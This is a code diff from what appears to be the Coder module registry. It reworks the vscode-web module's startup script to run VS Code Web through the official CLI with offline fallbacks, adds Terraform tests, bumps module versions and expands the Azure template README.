+    if python3 -c "import json,sys;m=lambda a,b:{**a,**{k:m(a[k],v)if k in a and type(a[k])==type(v)==dict else v for k,v in b.items()}};print(json.dumps(m(json.load(open(sys.argv[1])),json.loads(sys.argv[2])),indent=2))" "$settings_file" "$new_settings" > "$tmpfile" 2> /dev/null; then
+      mv "$tmpfile" "$settings_file"
+      printf "Merging settings...\n"
+      return 0
+    fi
+  fi
+
+  rm -f "$tmpfile"
+  printf "Warning: Could not merge settings. Keeping existing settings.\n"
+  return 0
+}
+
+# Set extension directory argument
 EXTENSION_ARG=""
 if [ -n "${EXTENSIONS_DIR}" ]; then
   EXTENSION_ARG="--extensions-dir=${EXTENSIONS_DIR}"
 fi
 
-# Set extension directory
+# Set server base path argument
 SERVER_BASE_PATH_ARG=""
 if [ -n "${SERVER_BASE_PATH}" ]; then
   SERVER_BASE_PATH_ARG="--server-base-path=${SERVER_BASE_PATH}"
 fi
 
-# Set disable workspace trust
+# Set disable workspace trust argument
 DISABLE_TRUST_ARG=""
 if [ "${DISABLE_TRUST}" = true ]; then
   DISABLE_TRUST_ARG="--disable-workspace-trust"
 fi
 
-run_vscode_web() {
-  echo "👷 Running $VSCODE_WEB serve-local $EXTENSION_ARG $SERVER_BASE_PATH_ARG $DISABLE_TRUST_ARG --port ${PORT} --host 127.0.0.1 --accept-server-license-terms --without-connection-token --telemetry-level ${TELEMETRY_LEVEL} in the background..."
-  echo "Check logs at ${LOG_PATH}!"
-  "$VSCODE_WEB" serve-local "$EXTENSION_ARG" "$SERVER_BASE_PATH_ARG" "$DISABLE_TRUST_ARG" --port "${PORT}" --host 127.0.0.1 --accept-server-license-terms --without-connection-token --telemetry-level "${TELEMETRY_LEVEL}" > "${LOG_PATH}" 2>&1 &
+# Check if code CLI is installed
+check_code_cli() {
+  if command -v code > /dev/null 2>&1; then
+    echo "code"
+    return 0
+  fi
+  if [ -f "${INSTALL_PREFIX}/bin/code" ]; then
+    echo "${INSTALL_PREFIX}/bin/code"
+    return 0
+  fi
+  return 1
 }
 
-# Check if the settings file exists...
-if [ ! -f ~/.vscode-server/data/Machine/settings.json ]; then
-  echo "⚙️ Creating settings file..."
-  mkdir -p ~/.vscode-server/data/Machine
-  echo "${SETTINGS}" > ~/.vscode-server/data/Machine/settings.json
-fi
-
-# Check if vscode-server is already installed for offline or cached mode
-if [ -f "$VSCODE_WEB" ]; then
-  if [ "${OFFLINE}" = true ] || [ "${USE_CACHED}" = true ]; then
-    echo "🥳 Found a copy of VS Code Web"
-    run_vscode_web
-    exit 0
+# Check if code-server is installed (fallback option)
+check_code_server() {
+  if command -v code-server > /dev/null 2>&1; then
+    echo "code-server"
+    return 0
   fi
-fi
-# Offline mode always expects a copy of vscode-server to be present
-if [ "${OFFLINE}" = true ]; then
-  echo "Failed to find a copy of VS Code Web"
-  exit 1
-fi
-
-# Create install prefix
-mkdir -p ${INSTALL_PREFIX}
-
-printf "$${BOLD}Installing Microsoft Visual Studio Code Server!\n"
-
-# Download and extract vscode-server
-ARCH=$(uname -m)
-case "$ARCH" in
-  x86_64) ARCH="x64" ;;
-  aarch64) ARCH="arm64" ;;
-  *)
-    echo "Unsupported architecture"
-    exit 1
-    ;;
-esac
-
-# Detect the platform
-if [ -n "${PLATFORM}" ]; then
-  DETECTED_PLATFORM="${PLATFORM}"
-elif [ -f /etc/alpine-release ] || grep -qi 'ID=alpine' /etc/os-release 2> /dev/null || command -v apk > /dev/null 2>&1; then
-  DETECTED_PLATFORM="alpine"
-elif [ "$(uname -s)" = "Darwin" ]; then
-  DETECTED_PLATFORM="darwin"
-else
-  DETECTED_PLATFORM="linux"
-fi
-
-# Check if a specific VS Code Web commit ID was provided
-if [ -n "${COMMIT_ID}" ]; then
-  HASH="${COMMIT_ID}"
-else
-  HASH=$(curl -fsSL https://update.code.visualstudio.com/api/commits/stable/server-$DETECTED_PLATFORM-$ARCH-web | cut -d '"' -f 2)
-fi
-printf "$${BOLD}VS Code Web commit id version $HASH.\n"
-
-output=$(curl -fsSL "https://vscode.download.prss.microsoft.com/dbazure/download/stable/$HASH/vscode-server-$DETECTED_PLATFORM-$ARCH-web.tar.gz" | tar -xz -C "${INSTALL_PREFIX}" --strip-components 1)
-
-if [ $? -ne 0 ]; then
-  echo "Failed to install Microsoft Visual Studio Code Server: $output"
-  exit 1
-fi
-printf "$${BOLD}VS Code Web has been installed.\n"
-
-# Install each extension...
-IFS=',' read -r -a EXTENSIONLIST <<< "$${EXTENSIONS}"
-# shellcheck disable=SC2066
-for extension in "$${EXTENSIONLIST[@]}"; do
-  if [ -z "$extension" ]; then
-    continue
+  if [ -f "${INSTALL_PREFIX}/bin/code-server" ]; then
+    echo "${INSTALL_PREFIX}/bin/code-server"
+    return 0
   fi
-  printf "🧩 Installing extension $${CODE}$extension$${RESET}...\n"
-  output=$($VSCODE_WEB "$EXTENSION_ARG" --install-extension "$extension" --force)
-  if [ $? -ne 0 ]; then
-    echo "Failed to install extension: $extension: $output"
-  fi
-done
+  return 1
+}
 
-if [ "${AUTO_INSTALL_EXTENSIONS}" = true ]; then
-  if ! command -v jq > /dev/null; then
-    echo "jq is required to install extensions from a workspace file."
-  else
-    # Prefer WORKSPACE if set and points to a file
-    if [ -n "${WORKSPACE}" ] && [ -f "${WORKSPACE}" ]; then
-      printf "🧩 Installing extensions from %s...\n" "${WORKSPACE}"
-      # Strip single-line comments then parse .extensions.recommendations[]
-      extensions=$(sed 's|//.*||g' "${WORKSPACE}" | jq -r '(.extensions.recommendations // [])[]')
-      for extension in $extensions; do
-        $VSCODE_WEB "$EXTENSION_ARG" --install-extension "$extension" --force
-      done
-    else
-      # Fallback to folder-based .vscode/extensions.json (existing behavior)
-      WORKSPACE_DIR="$HOME"
-      if [ -n "${FOLDER}" ]; then
-        WORKSPACE_DIR="${FOLDER}"
+# Find existing vscode-server binary (used by code serve-web internally)
+find_vscode_server() {
+  # Check common locations for pre-downloaded vscode-server
+  local server_dirs=(
+    "$HOME/.vscode-server/bin"
+    "$HOME/.vscode/cli/serve-web"
+  )
+  for dir in "$${server_dirs[@]}"; do
+    if [ -d "$dir" ]; then
+      # Find the most recent server version
+      local latest
+      latest=$(ls -t "$dir" 2> /dev/null | head -1)
+      if [ -n "$latest" ] && [ -f "$dir/$latest/bin/code-server" ]; then
+        echo "$dir/$latest/bin/code-server"
+        return 0
       fi
-      if [ -f "$WORKSPACE_DIR/.vscode/extensions.json" ]; then
-        printf "🧩 Installing extensions from %s/.vscode/extensions.json...\n" "$WORKSPACE_DIR"
-        extensions=$(sed 's|//.*||g' "$WORKSPACE_DIR/.vscode/extensions.json" | jq -r '.recommendations[]')
+      if [ -n "$latest" ] && [ -f "$dir/$latest/code-server" ]; then
+        echo "$dir/$latest/code-server"
+        return 0
+      fi
+    fi
+  done
+  return 1
+}
+
+# Install VS Code CLI if not present
+install_code_cli() {
+  printf "$${BOLD}Installing VS Code CLI...$${RESET}\n"
+
+  # Detect architecture
+  ARCH=$(uname -m)
+  case "$ARCH" in
+    x86_64) ARCH="x64" ;;
+    aarch64 | arm64) ARCH="arm64" ;;
+    armv7l) ARCH="armhf" ;;
+    *)
+      echo "Unsupported architecture: $ARCH"
+      exit 1
+      ;;
+  esac
+
+  # Detect platform
+  # Note: VS Code CLI uses 'alpine' for all Linux distributions
+  PLATFORM=$(uname -s)
+  case "$PLATFORM" in
+    Linux)
+      PLATFORM="alpine"
+      ;;
+    Darwin)
+      PLATFORM="darwin"
+      ;;
+    *)
+      echo "Unsupported platform: $PLATFORM"
+      exit 1
+      ;;
+  esac
+
+  # Create install directory
+  mkdir -p "${INSTALL_PREFIX}/bin"
+
+  # Download VS Code CLI
+  CLI_URL="https://code.visualstudio.com/sha/download?build=${RELEASE_CHANNEL}&os=cli-$PLATFORM-$ARCH"
+  printf "Downloading VS Code CLI from %s\n" "$CLI_URL"
+
+  if command -v curl > /dev/null 2>&1; then
+    curl -fsSL "$CLI_URL" -o "/tmp/vscode-cli.tar.gz"
+  elif command -v wget > /dev/null 2>&1; then
+    wget -q "$CLI_URL" -O "/tmp/vscode-cli.tar.gz"
+  else
+    echo "Neither curl nor wget is available. Please install one of them."
+    exit 1
+  fi
+
+  # Extract CLI
+  tar -xzf /tmp/vscode-cli.tar.gz -C "${INSTALL_PREFIX}/bin"
+  rm -f /tmp/vscode-cli.tar.gz
+
+  # The CLI binary is named 'code'
+  if [ -f "${INSTALL_PREFIX}/bin/code" ]; then
+    chmod +x "${INSTALL_PREFIX}/bin/code"
+    export PATH="${INSTALL_PREFIX}/bin:$PATH"
+    printf "$${BOLD}VS Code CLI installed successfully.$${RESET}\n"
+  else
+    echo "Failed to install VS Code CLI"
+    exit 1
+  fi
+}
+
+# Run VS Code Web using the code CLI (serve-web command)
+run_vscode_web_cli() {
+  local CODE_CMD="$1"
+
+  # Build the command arguments
+  ARGS="serve-web --port ${PORT} --host 127.0.0.1 --accept-server-license-terms --without-connection-token --telemetry-level ${TELEMETRY_LEVEL}"
+
+  if [ -n "$EXTENSION_ARG" ]; then
+    ARGS="$ARGS $EXTENSION_ARG"
+  fi
+
+  if [ -n "$SERVER_BASE_PATH_ARG" ]; then
+    ARGS="$ARGS $SERVER_BASE_PATH_ARG"
+  fi
+
+  if [ -n "$DISABLE_TRUST_ARG" ]; then
+    ARGS="$ARGS $DISABLE_TRUST_ARG"
+  fi
+
+  if [ -n "${COMMIT_ID}" ]; then
+    ARGS="$ARGS --commit-id ${COMMIT_ID}"
+  fi
+
+  printf "Starting VS Code Web on port ${PORT}...\n"
+  printf "Check logs at ${LOG_PATH}\n"
+
+  # shellcheck disable=SC2086
+  "$CODE_CMD" $ARGS > "${LOG_PATH}" 2>&1 &
+}
+
+# Run VS Code Web using code-server (fallback for offline mode)
+run_code_server() {
+  local SERVER_CMD="$1"
+
+  printf "Starting code-server on port ${PORT}...\n"
+  printf "Check logs at ${LOG_PATH}\n"
+
+  # Build arguments for code-server
+  ARGS="--port ${PORT} --host 127.0.0.1 --auth none"
+
+  if [ -n "$EXTENSION_ARG" ]; then
+    ARGS="$ARGS $EXTENSION_ARG"
+  fi
+
+  # shellcheck disable=SC2086
+  "$SERVER_CMD" $ARGS > "${LOG_PATH}" 2>&1 &
+}
+
+# Run VS Code Web using vscode-server binary directly
+run_vscode_server() {
+  local SERVER_CMD="$1"
+
+  printf "Starting VS Code Server on port ${PORT}...\n"
+  printf "Check logs at ${LOG_PATH}\n"
+
+  # Build arguments for vscode-server
+  ARGS="--port ${PORT} --host 127.0.0.1 --without-connection-token --accept-server-license-terms --telemetry-level ${TELEMETRY_LEVEL}"
+
+  if [ -n "$EXTENSION_ARG" ]; then
+    ARGS="$ARGS $EXTENSION_ARG"
+  fi
+
+  if [ -n "$SERVER_BASE_PATH_ARG" ]; then
+    ARGS="$ARGS $SERVER_BASE_PATH_ARG"
+  fi
+
+  # shellcheck disable=SC2086
+  "$SERVER_CMD" serve-local $ARGS > "${LOG_PATH}" 2>&1 &
+}
+
+# Install a single extension by downloading VSIX from marketplace
+install_extension_vsix() {
+  local ext_id="$1"
+  local publisher
+  local ext_name
+  publisher="$${ext_id%%.*}"
+  ext_name="$${ext_id#*.}"
+
+  # Download VSIX from marketplace
+  local vsix_url="https://$publisher.gallery.vsassets.io/_apis/public/gallery/publisher/$publisher/extension/$ext_name/latest/assetbyname/Microsoft.VisualStudio.Services.VSIXPackage"
+  local tmp_vsix="/tmp/ext-$ext_id.vsix"
+  local tmp_dir="/tmp/ext-$ext_id"
+
+  if command -v curl > /dev/null 2>&1; then
+    curl -fsSL "$vsix_url" -o "$tmp_vsix" 2> /dev/null
+  elif command -v wget > /dev/null 2>&1; then
+    wget -q "$vsix_url" -O "$tmp_vsix" 2> /dev/null
+  else
+    echo "Failed to install extension $ext_id: neither curl nor wget available"
+    return 1
+  fi
+
+  if [ ! -f "$tmp_vsix" ]; then
+    echo "Failed to download extension: $ext_id"
+    return 1
+  fi
+
+  # Extract VSIX (it's a ZIP file)
+  rm -rf "$tmp_dir"
+  mkdir -p "$tmp_dir"
+  if ! unzip -q "$tmp_vsix" -d "$tmp_dir" 2> /dev/null; then
+    echo "Failed to extract extension: $ext_id"
+    rm -f "$tmp_vsix"
+    return 1
+  fi
+
+  # Get version from package.json
+  local version=""
+  if [ -f "$tmp_dir/extension/package.json" ]; then
+    version=$(grep -o '"version"[[:space:]]*:[[:space:]]*"[^"]*"' "$tmp_dir/extension/package.json" | head -1 | cut -d'"' -f4)
+  fi
+  if [ -z "$version" ]; then
+    version="0.0.0"
+  fi
+
+  # Install to extensions directory
+  local ext_dir="$HOME/.vscode-server/extensions/$ext_id-$version"
+  mkdir -p "$HOME/.vscode-server/extensions"
+  rm -rf "$ext_dir"
+  mv "$tmp_dir/extension" "$ext_dir"
+
+  # Cleanup
+  rm -rf "$tmp_vsix" "$tmp_dir"
+  printf "Extension $ext_id v$version installed successfully.\n"
+  return 0
+}
+
+install_extensions() {
+  # Install specified extensions
+  IFS=',' read -r -a EXTENSIONLIST <<< "$${EXTENSIONS}"
+  for extension in "$${EXTENSIONLIST[@]}"; do
+    if [ -z "$extension" ]; then
+      continue
+    fi
+    printf "Installing extension $extension...\n"
+    install_extension_vsix "$extension"
+  done
+
+  # Auto-install extensions from workspace or folder
+  if [ "${AUTO_INSTALL_EXTENSIONS}" = true ]; then
+    if ! command -v jq > /dev/null; then
+      echo "jq is required to install extensions from a workspace file."
+    else
+      if [ -n "${WORKSPACE}" ] && [ -f "${WORKSPACE}" ]; then
+        printf "Installing extensions from %s...\n" "${WORKSPACE}"
+        extensions=$(sed 's|//.*||g' "${WORKSPACE}" | jq -r '(.extensions.recommendations // [])[]')
         for extension in $extensions; do
-          $VSCODE_WEB "$EXTENSION_ARG" --install-extension "$extension" --force
+          install_extension_vsix "$extension"
         done
+      else
+        WORKSPACE_DIR="$HOME"
+        if [ -n "${FOLDER}" ]; then
+          WORKSPACE_DIR="${FOLDER}"
+        fi
+        if [ -f "$WORKSPACE_DIR/.vscode/extensions.json" ]; then
+          printf "Installing extensions from %s/.vscode/extensions.json...\n" "$WORKSPACE_DIR"
+          extensions=$(sed 's|//.*||g' "$WORKSPACE_DIR/.vscode/extensions.json" | jq -r '.recommendations[]')
+          for extension in $extensions; do
+            install_extension_vsix "$extension"
+          done
+        fi
       fi
     fi
   fi
+}
+
+# Apply machine settings (merge with existing if present)
+SETTINGS_B64='${SETTINGS_B64}'
+if [ -n "$SETTINGS_B64" ]; then
+  SETTINGS_JSON="$(echo -n "$SETTINGS_B64" | base64 -d)"
+  merge_settings "$SETTINGS_JSON" ~/.vscode-server/data/Machine/settings.json
 fi
 
-run_vscode_web
+# Determine which command to use
+CODE_CMD=""
+RUN_MODE=""
+
+# Check for code CLI first (preferred)
+if CODE_CMD=$(check_code_cli); then
+  printf "$${BOLD}Found VS Code CLI at $CODE_CMD$${RESET}\n"
+  RUN_MODE="cli"
+fi
+
+# Handle offline mode
+if [ "${OFFLINE}" = true ]; then
+  if [ -n "$CODE_CMD" ]; then
+    # Check if vscode-server is already downloaded (code serve-web won't need to download)
+    if VSCODE_SERVER=$(find_vscode_server); then
+      printf "Found cached VS Code Server at $VSCODE_SERVER\n"
+      printf "Using cached VS Code CLI.\n"
+      run_vscode_web_cli "$CODE_CMD"
+      exit 0
+    fi
+    # Code CLI exists but vscode-server not cached - try using it anyway
+    # (it might work if server was pre-downloaded, or fail gracefully)
+    printf "Warning: VS Code Server may not be cached. Attempting to start...\n"
+    printf "Using cached VS Code CLI.\n"
+    run_vscode_web_cli "$CODE_CMD"
+    exit 0
+  fi
+
+  # Try code-server as fallback for offline mode
+  if SERVER_CMD=$(check_code_server); then
+    printf "$${BOLD}Found code-server at $SERVER_CMD (offline fallback)$${RESET}\n"
+    run_code_server "$SERVER_CMD"
+    exit 0
+  fi
+
+  # Try vscode-server binary directly
+  if VSCODE_SERVER=$(find_vscode_server); then
+    printf "$${BOLD}Found VS Code Server at $VSCODE_SERVER (offline fallback)$${RESET}\n"
+    run_vscode_server "$VSCODE_SERVER"
+    exit 0
+  fi
+
+  echo "Offline mode enabled but no VS Code CLI, code-server, or cached VS Code Server found."
+  exit 1
+fi
+
+# Handle use_cached mode
+if [ "${USE_CACHED}" = true ] && [ -n "$CODE_CMD" ]; then
+  printf "Using cached VS Code CLI.\n"
+  install_extensions
+  run_vscode_web_cli "$CODE_CMD"
+  exit 0
+fi
+
+# Install VS Code CLI if not present
+if [ -z "$CODE_CMD" ]; then
+  install_code_cli
+  CODE_CMD="${INSTALL_PREFIX}/bin/code"
+  RUN_MODE="cli"
+fi
+
+# Install extensions and run VS Code Web
+install_extensions
+run_vscode_web_cli "$CODE_CMD"

registry/coder/modules/vscode-web/vscode-web.tftest.hcl

@@ -0,0 +1,151 @@
+run "required_vars" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = true
+  }
+}
+
+run "accept_license_required" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = false
+  }
+
+  expect_failures = [
+    var.accept_license
+  ]
+}
+
+run "offline_and_use_cached_conflict" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = true
+    use_cached     = true
+    offline        = true
+  }
+
+  expect_failures = [
+    resource.coder_script.vscode-web
+  ]
+}
+
+run "offline_disallows_extensions" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = true
+    offline        = true
+    extensions     = ["ms-python.python", "golang.go"]
+  }
+
+  expect_failures = [
+    resource.coder_script.vscode-web
+  ]
+}
+
+run "workspace_and_folder_conflict" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = true
+    folder         = "/home/coder/project"
+    workspace      = "/home/coder/project.code-workspace"
+  }
+
+  expect_failures = [
+    resource.coder_script.vscode-web
+  ]
+}
+
+run "url_with_folder_query" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = true
+    folder         = "/home/coder/project"
+    port           = 13338
+  }
+
+  assert {
+    condition     = resource.coder_app.vscode-web.url == "http://localhost:13338?folder=%2Fhome%2Fcoder%2Fproject"
+    error_message = "coder_app URL must include encoded folder query param"
+  }
+}
+
+run "url_with_workspace_query" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = true
+    workspace      = "/home/coder/project.code-workspace"
+    port           = 13338
+  }
+
+  assert {
+    condition     = resource.coder_app.vscode-web.url == "http://localhost:13338?workspace=%2Fhome%2Fcoder%2Fproject.code-workspace"
+    error_message = "coder_app URL must include encoded workspace query param"
+  }
+}
+
+run "release_channel_stable" {
+  command = plan
+
+  variables {
+    agent_id        = "foo"
+    accept_license  = true
+    release_channel = "stable"
+  }
+}
+
+run "release_channel_insiders" {
+  command = plan
+
+  variables {
+    agent_id        = "foo"
+    accept_license  = true
+    release_channel = "insiders"
+  }
+}
+
+run "release_channel_invalid" {
+  command = plan
+
+  variables {
+    agent_id        = "foo"
+    accept_license  = true
+    release_channel = "invalid"
+  }
+
+  expect_failures = [
+    var.release_channel
+  ]
+}
+
+run "commit_id_empty_by_default" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = true
+  }
+}
+
+run "commit_id_with_value" {
+  command = plan
+
+  variables {
+    agent_id       = "foo"
+    accept_license = true
+    commit_id      = "e54c774e0add60467559eb0d1e229c6452cf8447"
+  }
+}

registry/coder/modules/windsurf/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.0"
+  version  = "1.3.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "windsurf" {
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.0"
+  version  = "1.3.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Windsurf to use the GitHub MCP server with auth
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.0"
+  version  = "1.3.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/windsurf/main.tf

@@ -65,7 +65,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.0"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 

registry/coder/templates/azure-linux/README.md

@@ -27,8 +27,21 @@ This template provisions the following resources:
 
 - Azure VM (ephemeral, deleted on stop)
 - Managed disk (persistent, mounted to `/home/coder`)
+- Resource group, virtual network, subnet, and network interface (persistent, required by the managed disk and VM)
 
-This means, when the workspace restarts, any tools or files outside of the home directory are not persisted. To pre-bake tools into the workspace (e.g. `python3`), modify the VM image, or use a [startup script](https://registry.terraform.io/providers/coder/coder/latest/docs/resources/script). Alternatively, individual developers can [personalize](https://coder.com/docs/dotfiles) their workspaces with dotfiles.
+### What happens on stop
+
+When a workspace is **stopped**, only the VM is destroyed. The managed disk, resource group, virtual network, subnet, and network interface all persist. This is by design — the managed disk retains your `/home/coder` data across workspace restarts, and the other resources remain because the disk depends on them.
+
+This means you will see these Azure resources in your subscription even when a workspace is stopped. This is expected behavior.
+
+### What happens on delete
+
+When a workspace is **deleted**, all resources are destroyed, including the resource group, networking resources, and managed disk.
+
+### Workspace restarts
+
+Since the VM is ephemeral, any tools or files outside of the home directory are not persisted across restarts. To pre-bake tools into the workspace (e.g. `python3`), modify the VM image, or use a [startup script](https://registry.terraform.io/providers/coder/coder/latest/docs/resources/script). Alternatively, individual developers can [personalize](https://coder.com/docs/dotfiles) their workspaces with dotfiles.
 
 > [!NOTE]
 > This template is designed to be a starting point! Edit the Terraform to extend the template to support your use case.

registry/cytoshahar/modules/positron/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "positron" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/cytoshahar/positron/coder"
-  version  = "1.0.1"
+  version  = "1.0.2"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "positron" {
 module "positron" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/cytoshahar/positron/coder"
-  version  = "1.0.1"
+  version  = "1.0.2"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }

registry/cytoshahar/modules/positron/main.tf

@@ -41,13 +41,13 @@ variable "group" {
 variable "slug" {
   type        = string
   description = "The slug of the app."
-  default     = "cursor"
+  default     = "positron"
 }
 
 variable "display_name" {
   type        = string
   description = "The display name of the app."
-  default     = "Cursor Desktop"
+  default     = "Positron Desktop"
 }
 
 data "coder_workspace" "me" {}
@@ -55,7 +55,7 @@ data "coder_workspace_owner" "me" {}
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.0"
+  version = "1.0.2"
 
   agent_id = var.agent_id